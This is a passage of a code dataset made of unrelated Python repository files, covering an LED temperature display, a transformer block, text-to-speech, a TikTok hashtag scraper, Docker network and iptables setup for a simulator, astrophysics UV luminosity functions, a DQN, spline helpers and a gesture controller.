[88, 89, 90] # minus\n ]\n}\n\n\ndef gen_char_values(chars):\n \"\"\"\n Generates the character pixel lists for supported characters.\n\n params:\n - chars (str): the chars to display on the RGB screen\n\n returns:\n - tuple: list[int], str\n \"\"\"\n num_chars = len(chars)\n max_chars = len(list(digits.keys())) # the list typecast is due to MicroPython awfulness\n if num_chars > max_chars:\n raise TooManyCharsException(\"'%s' exceeds the character limit: %s\" % (chars, max_chars))\n\n active_pixels = []\n # We will set the character positions from left to right\n for index, char in enumerate(chars):\n if char == \"-\":\n char = 10\n else:\n # allow a ValueError to be thrown if we aren't int'able.\n char = int(char)\n\n active_pixels.extend(digits[index][char])\n\n if chars == \"--\":\n background_colour = \"red\"\n else:\n real_num = int(chars)\n if real_num < 15:\n background_colour = \"blue\"\n elif 15 <= real_num < 26:\n background_colour = \"green\"\n elif 26 <= real_num < 30:\n background_colour = \"yellow\"\n else:\n background_colour = \"red\"\n\n return active_pixels, background_colour\n\n\ndef clear(neo):\n \"\"\"Clears the screen\"\"\"\n neo.fill([0, 0, 0])\n neo.show()\n return None, None\n\n\nclass BaseDisplayHandler:\n \"\"\"Base class for handling display controls from JSON POST request data.\"\"\"\n\n def __init__(self, json_request, neo, num_px):\n self.response = None\n self.status_code = None\n self.req_data = get_json_wsgi_input(json_request, bad_request)\n self.neo = neo\n self.num_px = num_px\n\n def clear(self):\n return clear(self.neo)\n\n def set(self):\n raise NotImplementedError(\"set method needs implementing.\")\n\n\nclass SetPx(BaseDisplayHandler):\n\n def set(self):\n if not isinstance(self.req_data, dict): # Something bad has happened here.\n return self.req_data\n\n self.clear()\n for rgb, pixels in self.req_data.items():\n if re.match(\"\\d\\d\\d\", rgb) and isinstance(pixels, list):\n for px in pixels:\n try:\n px_int = int(px)\n except Exception:\n return bad_request(\"Pixel numbers from list must be integers\")\n if px_int > self.num_px:\n return bad_request(\n \"Cannot set value to pixel %s. 
Max supported: %s\" % (px_int, self.num_px)\n )\n\n self.neo[int(px)] = [int(x * 200) for x in rgb]\n else:\n return bad_request('Input did not match schema. Example: {\"010\": [1,2,3,4,5], \"011\": [16,60]}')\n\n self.neo.show()\n return self.response, self.status_code\n\n\nclass DisplayUpdater:\n\n # background colours\n blue = [[0, 0, 200], [200, 200, 200]]\n yellow = [[200, 200, 0], [200, 0, 200]]\n green = [[0, 200, 0], [0, 200, 200]]\n red = [[200, 0, 0], [0, 0, 0]]\n\n def __init__(self, display_text, display_text_colour, background_colour, neo, num_px):\n self.display_text = display_text\n self.display_text_colour = display_text_colour\n self.background_colour = background_colour\n self.neo = neo\n self.num_px = num_px\n\n def set(self):\n normalized_text_colour = [int(int(x) * 200) for x in self.display_text_colour]\n # create entire screen (background)\n for x in range(self.num_px):\n self.neo[x] = getattr(self, self.background_colour)[randint(0, 1)]\n\n # update screen values to include the temp value\n for text_px in self.display_text:\n self.neo[int(text_px)] = normalized_text_colour\n\n self.neo.show()\n\n\nclass SetTemp(BaseDisplayHandler):\n\n def set(self):\n if not isinstance(self.req_data, dict): # Something bad has happened here.\n return self.req_data\n\n rbg_text_colour = None\n for rgb, temp_value in self.req_data.items():\n # make sure we are a string\n temp_value = str(temp_value)\n # simple regex for temp. \"--\" is a valid value for null, \\d- is clearly just nonsense.\n # regex's are a little hideous as MicroPython's regex engine isn't too glamorous...\n if re.match(\"\\d\\d\\d\", rgb) and re.match(\"(--)|(^-\\d)|(\\d\\d)|(\\d)\", temp_value):\n rgb_temp_vals, background_colour = gen_char_values(temp_value)\n rbg_text_colour = rgb\n break\n else:\n raise Exception(\n \"Input value %s doesn't appear to match the expected format: \\{'001': '-3'\\}.\" % self.req_data\n )\n\n return DisplayUpdater(rgb_temp_vals, rbg_text_colour, background_colour, self.neo, self.num_px)\n","repo_name":"another-salad/pico-temp-display","sub_path":"libs/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":6683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9970519249","text":"from utils import *\nfrom multiheadattentiom import *\n\nclass TransformerBlock(nn.Module):\n def __init__(self, embed_dim, exapansion_factor=4, n_heads=4):\n super(TransformerBlock, self).__init__()\n\n self.attention = MultiheadedAttention(embed_dim, n_heads)\n self.norm1 = nn.Linear(embed_dim)\n self.norm2 = nn.Linear(embed_dim)\n\n self.feed_forward = nn.Sequential(\n nn.Linear(embed_dim, exapansion_factor*embed_dim),\n nn.ReLU(),\n nn.Linear(exapansion_factor*embed_dim, embed_dim)\n )\n\n self.dropout1 = nn.Dropout(0.2)\n self.dropout2 = nn.Dropout(0.2)\n\n def forward(self, key, query, value, mask=None):\n\n attention_out = self.attention(key, query, value, mask)\n attention_residual_out = attention_out + value\n norm1_out = self.dropout1(self.norm1(attention_residual_out))\n\n feed_fwd_out = self.feed_forward(norm1_out)\n\n feed_fwd_residual_out = feed_fwd_out + norm1_out\n\n norm2_out = self.dropout2(self.norm2(feed_fwd_residual_out))\n\n return norm2_out","repo_name":"anilnishad19799/Transformer_from_scratch","sub_path":"transformerblock.py","file_name":"transformerblock.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} 
+{"seq_id":"24227492349","text":"# %%\n# https://pypi.org/project/pyttsx3/\n\nimport pyttsx3\nengine = pyttsx3.init() # object creation\n\n\"\"\" RATE\"\"\"\nrate = engine.getProperty('rate') # getting details of current speaking rate\nengine.setProperty('rate', 150) # setting up new voice rate\n\"\"\"VOLUME\"\"\"\nvolume = engine.getProperty('volume') #getting to know current volume level (min=0 and max=1)\nengine.setProperty('volume',1.0) # setting up volume level between 0 and 1\n\"\"\"VOICE\"\"\"\nvoices = engine.getProperty('voices') #getting details of current voice\nengine.setProperty('voice', voices[1].id) #changing index, changes voices. 1 for female\n\n\"\"\"Saving Voice to a file\"\"\"\nengine.save_to_file('Clean and develop using Python. This is the presentation from group F. Abdulaziz, Juan Pedro, Jacob, Aleksandar, Esperanza and Addison', 'storage/slide_1.mp3')\nengine.save_to_file('EXPLORATORY DATA ANALYSIS, or EDA for short.', 'storage/slide_5.mp3')\nengine.save_to_file(\"DATA PREPARATION. Let's talk about data quality and how to fix.\", 'storage/slide_11.mp3')\nengine.save_to_file(\"Modelling. We are going to create and evaluate linear regression models.\", 'storage/slide_21.mp3')\nengine.save_to_file(\"Thank you.\", 'storage/slide_28.mp3')\nengine.runAndWait()\n\n# %%\n","repo_name":"juanbretti/gmbd_python_group1","sub_path":"Group_F_TTS.py","file_name":"Group_F_TTS.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37935697498","text":"def next(li,n):\n for i in range(0,n):\n if i==n-1:\n break\n elif li[i]==3 and li[i+1]==3:\n return True\n return False\n\nli=[]\nn=int(input('enter the number of elements you want in list:'))\nfor i in range(0,n):\n x=int(input('enter element'))\n li.append(x)\nprint(next(li,n))","repo_name":"Simran21Arora/CYBER","sub_path":"assignment3/ques5.py","file_name":"ques5.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20290136772","text":"import time\nfrom tiktokapipy.api import TikTokAPI\nimport csv\nimport warnings\nfrom tiktokapipy import TikTokAPIWarning\n\nwarnings.filterwarnings(\"ignore\", category=TikTokAPIWarning)\n\n\ndef getHashtaggedVideos():\n seen = set()\n arr = []\n with TikTokAPI() as api:\n challenge = api.challenge(challenge_name=\"fashion\", video_limit=100)\n # some videos are unable to be parsed by this api, we give a little cushion here to make sure we can get to 100 total\n for video in challenge.videos.limit(120):\n if not video:\n continue\n if video.id not in seen:\n seen.add(video.id)\n arr.append(video)\n # return once we find 100\n if len(arr) == 100:\n return arr\n return arr\n\n\nif __name__ == \"__main__\":\n print(\"fetching videos\")\n startTime = round(time.time())\n\n vids = getHashtaggedVideos()\n rows = []\n for vid in vids:\n row = [vid.id, vid.desc, [c.title for c in vid.challenges], vid.stats.play_count, vid.stats.comment_count, vid.stats.share_count, vid.video.play_addr, vid.video.download_addr, vid.music.id, vid.music.title, vid.author.unique_id, vid.create_time, startTime]\n rows.append(row)\n\n field_names = [\"VideoID\", \"VideoDescription\", \"HashTags\", \"PlayCount\", \"CommentCount\", \"ShareCount\", \"VideoPlayAddr\", \"VideoDownloadAddr\", \"MusicID\", \"AuthorID\", \"DatePosted\", \"DateFetched\"]\n\n csv_file_path = f\"scraped_data_{startTime}.csv\"\n\n with open(csv_file_path, 
mode='w', newline='', encoding='utf-8') as csv_file:\n print(f\"writing file to {csv_file_path}\")\n writer = csv.writer(csv_file)\n writer.writerow(field_names)\n writer.writerows(rows)\n\n print(\"exited successfully\")","repo_name":"sethengland/TTFashionScraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24040631615","text":"import ipaddress\nimport json\n\nfrom cirque.common.cirquelog import CirqueLog\nfrom cirque.common.utils import host_run, manipulate_iptable_src_dst_rule\n\nIPV6_SUBNET = \"2001:db8:1::/64\"\nIPV6_GATEWAY = \"2001:db8:1::1\"\n\nclass HomeLan:\n\n def __init__(self, name, internal=False, ipv6=False):\n self.logger = CirqueLog.get_cirque_logger('lan_{}'.format(name))\n self.__name = name\n self.__internal = internal\n self.__ipv6 = ipv6\n self.subnet = None\n self.gateway = None\n if 'ipvlan' in self.__name:\n self.__create_ipvlan_network()\n else:\n self.__create_docker_network()\n # bypass disable mutual access for ipv4\n # in ipv6 feature.\n if 'ipv6' not in self.__name:\n self.__disable_container_mutual_access()\n\n def __create_docker_network(self):\n # The docker-py library will add a weird route which disconnects\n # the host when creating networks. The `docker network inspect`isn't\n # supported neither so we use bash commands directly.\n cmd = ['docker', 'network', 'create', self.__name]\n if self.__internal:\n cmd.append('--internal')\n elif self.__ipv6:\n cmd.append('--subnet=\"{}\"'.format(IPV6_SUBNET))\n cmd.append('--gateway=\"{}\"'.format(IPV6_GATEWAY))\n cmd.append('--ipv6')\n ret = host_run(self.logger, cmd)\n if ret.returncode != 0:\n self.logger.error('Failed to create home lan %s', self.__name)\n if self.__ipv6:\n self.__enable_ipv6_external_access()\n\n def __create_ipvlan_network(self):\n interface_command = \"route | awk '/default / {print $8}'\"\n ret = host_run(self.logger, interface_command)\n if ret.returncode != 0:\n self.logger.error('Failed to get network interface for creating '\n 'ipvlan %s: %s' % (self.__name, ret.stderr))\n interface = ret.stdout.rstrip().decode('utf-8')\n subnet_command = \"ip addr show %s | awk '/inet / {print $2}'\" % interface\n ret = host_run(self.logger, subnet_command)\n if ret.returncode != 0:\n self.logger.error('Failed to get subnetwork for create '\n 'ipvalen %s: %s' % (self.__name, ret.stderr))\n subnet = ret.stdout.rstrip().decode('utf-8')\n gateway_command = \"ip r | awk '/default via/ {print $3}'\"\n ret = host_run(self.logger, gateway_command)\n if ret.returncode != 0:\n self.logger.error('Failed to retrieve gateway for create '\n 'ipvalen %s: %s' % (self.__name, ret.stderr))\n gateway = ret.stdout.rstrip().decode('utf-8')\n ipvlan_command = 'docker network create -d ipvlan --subnet=%s'\\\n ' --gateway=%s -o parent=%s %s' % (\n subnet, gateway, interface, self.__name)\n ret = host_run(self.logger, ipvlan_command)\n if ret.returncode != 0:\n self.logger.error('Failed to create ipvlan %s: %s' %\n (self.__name, ret.stderr))\n self.__inspect_network_properties()\n\n def __disable_container_mutual_access(self):\n self.__inspect_network_properties()\n manipulate_iptable_src_dst_rule(self.logger, self.subnet, self.subnet,\n 'DROP')\n manipulate_iptable_src_dst_rule(self.logger, self.gateway, self.subnet,\n 'ACCEPT')\n manipulate_iptable_src_dst_rule(self.logger, self.subnet, self.gateway,\n 'ACCEPT')\n\n def __disable_ipv6_external_access(self):\n 
flush_command = \"ip6tables -t nat -F\"\n ret = host_run(self.logger, flush_command)\n if ret.returncode != 0:\n self.logger.error(\"Unable to flush nat rule from ipv6...\")\n\n def __enable_ipv6_external_access(self):\n ip6tables_command = \" \".join(\n [\"ip6tables -t nat -A POSTROUTING -s {}\".format(IPV6_SUBNET),\n \"! -o docker0 -j MASQUERADE\"])\n ret = host_run(self.logger, ip6tables_command)\n if ret.returncode != 0:\n self.logger.error('Fail to setup ipv6 external access in ip6tables')\n\n def __inspect_network_properties(self):\n ret = host_run(self.logger, ['docker', 'network', 'inspect', self.__name])\n if ret.returncode != 0:\n self.logger.error('Failed to inspect home lan %s' % self.__name)\n return\n network_info = json.loads(ret.stdout.decode())\n if not network_info:\n self.logger.error('Failed to inspect home lan %s' % self.__name)\n return\n network_configs = network_info[0]['IPAM']['Config']\n if 'ipv6' not in self.__name and len(network_configs) != 1:\n self.logger.error('Unexpected network behavior on home lan %s' %\n self.__name)\n self.subnet = network_configs[0]['Subnet']\n self.gateway = network_configs[0]['Gateway']\n\n def close(self):\n if not self.subnet:\n return\n cmd = ['docker', 'network', 'rm', self.__name]\n if host_run(self.logger, cmd).returncode != 0:\n self.logger.error('Failed to remove home lan %s', self.__name)\n if self.__ipv6:\n self.__disable_ipv6_external_access()\n if all(nwk not in self.__name for nwk in ('ipv6', 'ipvlan')):\n manipulate_iptable_src_dst_rule(\n self.logger, self.subnet, self.subnet, 'DROP', add=False)\n manipulate_iptable_src_dst_rule(\n self.logger, self.gateway, self.subnet, 'ACCEPT', add=False)\n manipulate_iptable_src_dst_rule(\n self.logger, self.subnet, self.gateway, 'ACCEPT', add=False)\n self.gateway = None\n self.subnet = None\n\n @property\n def name(self):\n return self.__name\n\n @property\n def internal(self):\n return self.__internal\n\n def __del__(self):\n self.close()\n","repo_name":"openweave/cirque","sub_path":"cirque/connectivity/homelan.py","file_name":"homelan.py","file_ext":"py","file_size_in_byte":5500,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"77"} +{"seq_id":"11999559354","text":"\"\"\"\n\nCompute UVLFs given our SFR and HMF models.\n\nAuthor: Julian B. Muñoz\nUT Austin - June 2023\n\n\"\"\"\n\nfrom . import cosmology\nfrom . import constants\nfrom .sfrd import SFR\nfrom .cosmology import bias_Tinker\n\nimport numpy as np\nfrom scipy.special import erf\n\n\n\n\n\n\ndef MUV_of_SFR(SFRtab, kappaUV):\n 'returns MUV, uses SFR. Dust added later in loglike.'\n #convert SFR to MUVs\n LUVtab = SFRtab/kappaUV\n MUVtab = 51.63 - 2.5 * np.log10(LUVtab) #AB magnitude \n return MUVtab\n\n\n#and combine to get UVLF:\ndef UVLF_binned(Astro_Parameters,Cosmo_Parameters,HMF_interpolator, zcenter, zwidth, MUVcenters, MUVwidths, DUST_FLAG=True, RETURNBIAS = False):\n 'Binned UVLF in units of 1/Mpc^3/mag, for bins at with a Gaussian width zwidth, centered at MUV centers with tophat width MUVwidths. z width only in HMF since that varies the most rapidly. 
If flag RETURNBIAS set to true it returns number-avgd bias instead of UVLF, still have to divide by UVLF'\n \n if(constants.NZ_TOINT>1):\n DZ_TOINT = np.linspace(-np.sqrt(constants.NZ_TOINT/3.),np.sqrt(constants.NZ_TOINT/3.),constants.NZ_TOINT) #in sigmas around zcenter\n else:\n DZ_TOINT = np.array([0.0])\n WEIGHTS_TOINT = np.exp(-DZ_TOINT**2/2.)/np.sum(np.exp(-DZ_TOINT**2/2.)) #assumed Gaussian in z, fair\n\n\n\n \n SFRlist = SFR(Astro_Parameters,Cosmo_Parameters,HMF_interpolator,zcenter)\n sigmaUV = Astro_Parameters.sigmaUV\n \n if (constants.FLAG_RENORMALIZE_LUV == True): #lower the LUV (or SFR) to recover the true avg, not log-avg\n SFRlist/= np.exp((np.log(10)/2.5*sigmaUV)**2/2.0)\n \n MUVbarlist = MUV_of_SFR(SFRlist, Astro_Parameters._kappaUV) #avg for each Mh\n MUVbarlist = np.fmin(MUVbarlist,constants._MAGMAX)\n \n \n\n if(RETURNBIAS==True): # weight by bias\n biasM = np.array([bias_Tinker(Cosmo_Parameters, HMF_interpolator.sigma_int(HMF_interpolator.Mhtab,zcenter+dz*zwidth)) for dz in DZ_TOINT])\n else: # do not weight by bias\n biasM = np.ones_like(WEIGHTS_TOINT)\n \n \n HMFtab = np.array([HMF_interpolator.HMF_int(HMF_interpolator.Mhtab,zcenter+dz*zwidth) for dz in DZ_TOINT])\n HMFcurr = np.sum(WEIGHTS_TOINT * HMFtab.T * biasM.T,axis=1)\n\n #cannot directly 'dust' the theory since the properties of the IRX-beta relation are calibrated on observed MUV. Recursion instead: \n currMUV = MUVbarlist \n if(DUST_FLAG==True):\n currMUV2 = np.ones_like(currMUV)\n while(np.sum(np.abs((currMUV2-currMUV)/currMUV)) > 0.02):\n currMUV = MUVbarlist + AUV(Astro_Parameters,zcenter,currMUV) \n currMUV2 = currMUV\n \n \n MUVcuthi = MUVcenters + MUVwidths/2.\n MUVcutlo = MUVcenters - MUVwidths/2.\n \n xhi = np.subtract.outer(MUVcuthi , currMUV)/(np.sqrt(2) * sigmaUV)\n xlo = np.subtract.outer(MUVcutlo, currMUV )/(np.sqrt(2) * sigmaUV)\n weights = (erf(xhi) - erf(xlo)).T/(2.0 * MUVwidths)\n \n UVLF_filtered = np.trapz(weights.T * HMFcurr, HMF_interpolator.Mhtab, axis=-1)\n \n return UVLF_filtered\n\n\n\n\n\n#####Here the dust attenuation\ndef AUV(Astro_Parameters, z, MUV, HIGH_Z_DUST = True, _zmaxdata=8.0):\n 'Average attenuation A as a function of OBSERVED z and magnitude. If using on theory iterate until convergence. HIGH_Z_DUST is whether to do dust at higher z than 0 or set to 0. 
Fix at \\beta(z=8) result if so'\n \n betacurr = beta(z,MUV)\n \n C0, C1 = Astro_Parameters.C0dust, Astro_Parameters.C1dust \n \n sigmabeta = 0.34 #from Bouwens 2014\n \n Auv = C0 + 0.2*np.log(10)*sigmabeta**2 * C1**2 + C1 * betacurr\n Auv=Auv.T\n if not (HIGH_Z_DUST):\n Auv*=np.heaviside(_zmaxdata - z,0.5)\n Auv=Auv.T\n return np.fmax(Auv, 0.0)\n\ndef beta(z, MUV):\n 'Color as a function of redshift and mag, interpolated from Bouwens 2013-14 data.'\n\n zdatbeta = [2.5,3.8,5.0,5.9,7.0,8.0]\n betaMUVatM0 = [-1.7,-1.85,-1.91,-2.00,-2.05,-2.13]\n dbeta_dMUV = [-0.20,-0.11,-0.14,-0.20,-0.20,-0.15]\n\n _MUV0 = -19.5\n _c = -2.33\n\n betaM0 = np.interp(z, zdatbeta, betaMUVatM0, left=betaMUVatM0[0], right=betaMUVatM0[-1])\n dbetaM0 = (MUV - _MUV0).T * np.interp(z, zdatbeta, dbeta_dMUV, left=dbeta_dMUV[0], right=dbeta_dMUV[-1]) \n \n sol1 = (betaM0-_c) * np.exp(dbetaM0/(betaM0-_c))+_c #for MUV > MUV0\n sol2 = dbetaM0 + betaM0 #for MUV < MUV0\n \n return sol1.T * np.heaviside(MUV - _MUV0, 0.5) + sol2.T * np.heaviside(_MUV0 - MUV, 0.5)\n","repo_name":"JulianBMunoz/Zeus21","sub_path":"zeus21/UVLFs.py","file_name":"UVLFs.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"} +{"seq_id":"72384547129","text":"import numpy as np\n\nclass DQN():\n def __init__(self, policy_model, target_model, discount):\n self.policy_model = policy_model\n self.target_model = target_model\n self.update_target_weights()\n self.discount = discount\n\n\n def _get_qs(self, model, states) -> np.array:\n return model.predict(\n # Use [-3:] not to predict on batch size dimension\n np.array(states).reshape(-1,*states.shape[-3:]))\n\n\n def get_policy_qs(self, states) -> np.array:\n return self._get_qs(self.policy_model, states)\n\n\n def _valid_max_q(self, qs, valid_moves) -> float:\n mask = np.zeros(qs.shape[0], dtype=int)\n mask[valid_moves] = 1\n return np.max(qs[mask == True])\n\n\n def _prep_training_input(self, experiences):\n current_states = np.array([exp[0] for exp in experiences])\n future_states = np.array([exp[3] for exp in experiences])\n current_qs_list = self._get_qs(self.policy_model, current_states)\n future_qs_list = self._get_qs(self.target_model, future_states)\n\n X = []\n y = []\n for index, (state, action, reward, _, next_valid_moves,\n is_terminal_state) in enumerate(experiences):\n\n if not is_terminal_state:\n future_qs = future_qs_list[index]\n # Only consider valid moves for next state\n max_future_q = self._valid_max_q(future_qs, next_valid_moves)\n new_q = reward + self.discount * max_future_q\n else:\n new_q = reward\n\n current_qs = current_qs_list[index]\n current_qs[action] = new_q\n\n X.append(state)\n y.append(current_qs)\n return X, y\n\n\n def train(self, experiences, game_done, callbacks=None):\n X, y = self._prep_training_input(experiences)\n\n # Fit on all samples as one batch, log only on terminal state\n self.policy_model.model.fit(\n np.array(X),\n np.array(y),\n batch_size=len(experiences),\n verbose=0,\n shuffle=False,\n callbacks=callbacks if game_done else None)\n\n\n def update_target_weights(self):\n self.target_model.model.set_weights(\n self.policy_model.model.get_weights())\n","repo_name":"erikgrip/tictactoe_reinforcement_learning","sub_path":"tic_tac_toe/agent/algorithm/dqn.py","file_name":"dqn.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13277304042","text":"import numpy as 
np\nfrom scipy.interpolate import RegularGridInterpolator\nfrom scipy.interpolate import UnivariateSpline\nfrom scipy.integrate import solve_ivp\n\n\ndef roi2splines(roi: dict) -> dict:\n \"\"\"Takes a dict of ROIs and returns a dict of fitted cubic splines.\n\n Iterates through all elements in roi and returns a dict of cubic splines.\n The returned dict has the same keys as roi. The function assumes that roi\n consists of 'polyline's.\n\n Note that the axis direction for each spline is switched!\n\n See also https://github.com/hadim/read-roi\n\n Args:\n roi (dict): A dict of dicts.\n\n Returns:\n dict: A dict with elements of type scipy.interpolate.UnivariateSpline\n\n \"\"\"\n spl = dict()\n for v in roi:\n x, y = removeduplicates(np.asarray(roi[v]['y']),\n np.asarray(roi[v]['x']))\n spl[v] = UnivariateSpline(x, y, k=3)\n return spl\n\n\ndef removeduplicates(x: np.array, y: np.array) -> (np.array, np.array):\n \"\"\"Takes to arrays of ints and removes entries that appear as duplicates in\n the first array.\n\n Args:\n x (np.array): The first array.\n y (np.array): The second array.\n\n Returns:\n np.array: Cleaned first array.\n np.array: Cleaned second array.\n \"\"\"\n seen = set()\n ind = []\n for k in range(x.size):\n if x[k] not in seen:\n seen.add(x[k])\n ind.append(k)\n\n xr = x[ind]\n yr = y[ind]\n return xr, yr\n\n\ndef compute_error(vel: np.array, roi, spl) -> dict:\n \"\"\"Takes a velocity array, a roi instance, fitted splines, and returns a\n dictionary of error arrays.\n\n Args:\n vel (np.array): The velocity.\n roi: A roi instance.\n spl: Fitted spolines.\n\n Returns:\n error (dict): A dictionary of errors.\n \"\"\"\n m, n = vel.shape\n grid1 = np.linspace(0, m - 1, m)\n grid2 = np.linspace(0, n - 1, n)\n rgi = RegularGridInterpolator(points=[grid1, grid2], values=vel,\n method='linear', bounds_error=False,\n fill_value=0)\n\n error = dict()\n for v in roi:\n y = roi[v]['y']\n\n # Interpolate velocity.\n y = np.arange(y[0], y[-1] + 1, 1)\n x = np.array(spl[v](y))\n veval = rgi((y, x))\n\n # Compute derivative of spline.\n derivspl = spl[v].derivative()\n\n # Compute error in velocity.\n error[v] = abs(derivspl(y) * m / n - veval)\n return error\n\n\ndef compute_endpoint_error(vel: np.array, roi, spl) -> (dict, dict):\n \"\"\"Takes a velocity array, a roi instance, fitted splines, and returns a\n dictionary of error arrays.\n\n Args:\n vel (np.array): The velocity.\n roi: A roi instance.\n spl: Fitted spolines.\n\n Returns:\n error (dict): A dictionary of errors.\n curve (dict): A dictionary of points of the trajectory.\n \"\"\"\n m, n = vel.shape\n grid1 = np.linspace(0, m - 1, m)\n grid2 = np.linspace(0, n - 1, n)\n rgi = RegularGridInterpolator(points=[grid1, grid2], values=vel,\n method='linear', bounds_error=False,\n fill_value=0)\n\n # Scale according to grid.\n hx, hy = 1.0 / (m - 1), 1.0 / (n - 1)\n vel = vel * hx / hy\n\n # Define ODE.\n def ode(t, y): return rgi((t, y))\n\n error = dict()\n curve = dict()\n for v in roi:\n y = roi[v]['y']\n\n # Interpolate velocity.\n y = np.arange(y[0], y[-1] + 1, 1)\n x = np.array(spl[v](y))\n\n # Solve initial value problem.\n sol = solve_ivp(ode, [y[0], y[-1]], [x[0]], t_eval=y, method='RK45')\n\n # Compute error in velocity.\n error[v] = abs(x - sol.y[0, :])\n curve[v] = sol.y[0, :]\n return error, 
curve\n","repo_name":"lukaslang/ofmc","sub_path":"ofmc/util/roihelpers.py","file_name":"roihelpers.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"71151751288","text":"\"\"\"\n This class extends LineBuilder to draw function on matplotlib figures.\n\n !!!!! Disclaimer !!!!!\n To draw on the matplotlib window you have to disable SciView on PyCharm:\n File -> Settings -> Tools -> Python Scientific -> deselect option\n\"\"\"\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nfrom project.dia_pckg.chart_drawer.LineBuilder import LineBuilder\n\n\nclass FunctionBuilder(LineBuilder):\n\n def __init__(self, x_interval, y_interval):\n \"\"\"\n :param x_interval: [x0, x1]\n :param y_interval: [y0, y1]\n \"\"\"\n\n self.x_interval = x_interval\n self.y_interval = y_interval\n\n # initialize plot window\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.set_xlim(x_interval[0], x_interval[1])\n ax.set_ylim(y_interval[0], y_interval[1])\n line, = ax.plot([], []) # empty line\n super().__init__(line)\n\n self.last_xdata = x_interval[0]\n\n def start(self):\n plt.show()\n\n def __call__(self, event):\n if event.inaxes != self.line.axes:\n return\n if event.xdata < self.last_xdata:\n return\n\n self.xs.append(event.xdata)\n self.ys.append(event.ydata)\n self.line.set_data(self.xs, self.ys)\n self.line.figure.canvas.draw()\n\n self.last_xdata = event.xdata\n\n def get_xydata(self):\n \"\"\"\n :return: x, y as numpy arrays\n \"\"\"\n x = self.line.get_xdata()\n y = self.line.get_ydata()\n return np.asarray(x), np.asarray(y)\n","repo_name":"damiano1996/DataIntelligenceApplications","sub_path":"project/dia_pckg/chart_drawer/FunctionBuilder.py","file_name":"FunctionBuilder.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"11105166748","text":"import cv2\nimport mediapipe as mp\nimport pyautogui\nimport math\nfrom enum import IntEnum\nfrom ctypes import cast, POINTER\nfrom comtypes import CLSCTX_ALL\nfrom pycaw.pycaw import AudioUtilities, IAudioEndpointVolume\nfrom google.protobuf.json_format import MessageToDict\nimport screen_brightness_control as sbcontrol\n\npyautogui.FAILSAFE = False\nmp_drawing = mp.solutions.drawing_utils\nmp_hands = mp.solutions.hands\n\n# Gesture Encodings \nclass Gest(IntEnum):\n # Binary Encoded\n FIST = 0\n PINKY = 1\n RING = 2\n MID = 4\n LAST3 = 7\n INDEX = 8\n FIRST2 = 12\n LAST4 = 15\n THUMB = 16 \n PALM = 31\n \n # Extra Mappings\n V_GEST = 33\n TWO_FINGER_CLOSED = 34\n PINCH_MAJOR = 35\n PINCH_MINOR = 36\n\n# Multi-handedness Labels\nclass HLabel(IntEnum):\n MINOR = 1\n MAJOR = 1\n\n# Convert Mediapipe Landmarks to recognizable Gestures\nclass HandRecog:\n \n def __init__(self, hand_label):\n self.finger = 0\n self.ori_gesture = Gest.PALM\n self.prev_gesture = Gest.PALM\n self.frame_count = 0\n self.hand_result = None\n self.hand_label = hand_label\n \n def update_hand_result(self, hand_result):\n self.hand_result = hand_result\n\n def get_signed_dist(self, point):\n sign = -1\n if self.hand_result.landmark[point[0]].y < self.hand_result.landmark[point[1]].y:\n sign = 1\n dist = (self.hand_result.landmark[point[0]].x - self.hand_result.landmark[point[1]].x)**2\n dist += (self.hand_result.landmark[point[0]].y - self.hand_result.landmark[point[1]].y)**2\n dist = math.sqrt(dist)\n return dist*sign\n \n def get_dist(self, point):\n dist = 
(self.hand_result.landmark[point[0]].x - self.hand_result.landmark[point[1]].x)**2\n dist += (self.hand_result.landmark[point[0]].y - self.hand_result.landmark[point[1]].y)**2\n dist = math.sqrt(dist)\n return dist\n \n def get_dz(self,point):\n return abs(self.hand_result.landmark[point[0]].z - self.hand_result.landmark[point[1]].z)\n \n # Function to find Gesture Encoding using current finger_state.\n # Finger_state: 1 if finger is open, else 0\n def set_finger_state(self):\n if self.hand_result == None:\n return\n\n points = [[8,5,0],[12,9,0],[16,13,0],[20,17,0]]\n self.finger = 0\n self.finger = self.finger | 0 #thumb\n for idx,point in enumerate(points):\n \n dist = self.get_signed_dist(point[:2])\n dist2 = self.get_signed_dist(point[1:])\n \n try:\n ratio = round(dist/dist2,1)\n except:\n ratio = round(dist/0.01,1)\n\n self.finger = self.finger << 1\n if ratio > 0.5 :\n self.finger = self.finger | 1\n \n\n # Handling Fluctations due to noise\n def get_gesture(self):\n if self.hand_result == None:\n return Gest.PALM\n\n current_gesture = Gest.PALM\n if self.finger in [Gest.LAST3,Gest.LAST4] and self.get_dist([8,4]) < 0.05:\n if self.hand_label == HLabel.MINOR :\n current_gesture = Gest.PINCH_MINOR\n else:\n current_gesture = Gest.PINCH_MAJOR\n\n elif Gest.FIRST2 == self.finger :\n point = [[8,12],[5,9]]\n dist1 = self.get_dist(point[0])\n dist2 = self.get_dist(point[1])\n ratio = dist1/dist2\n if ratio > 1.7:\n current_gesture = Gest.V_GEST\n else:\n if self.get_dz([8,12]) < 0.1:\n current_gesture = Gest.TWO_FINGER_CLOSED\n else:\n current_gesture = Gest.MID\n \n else:\n current_gesture = 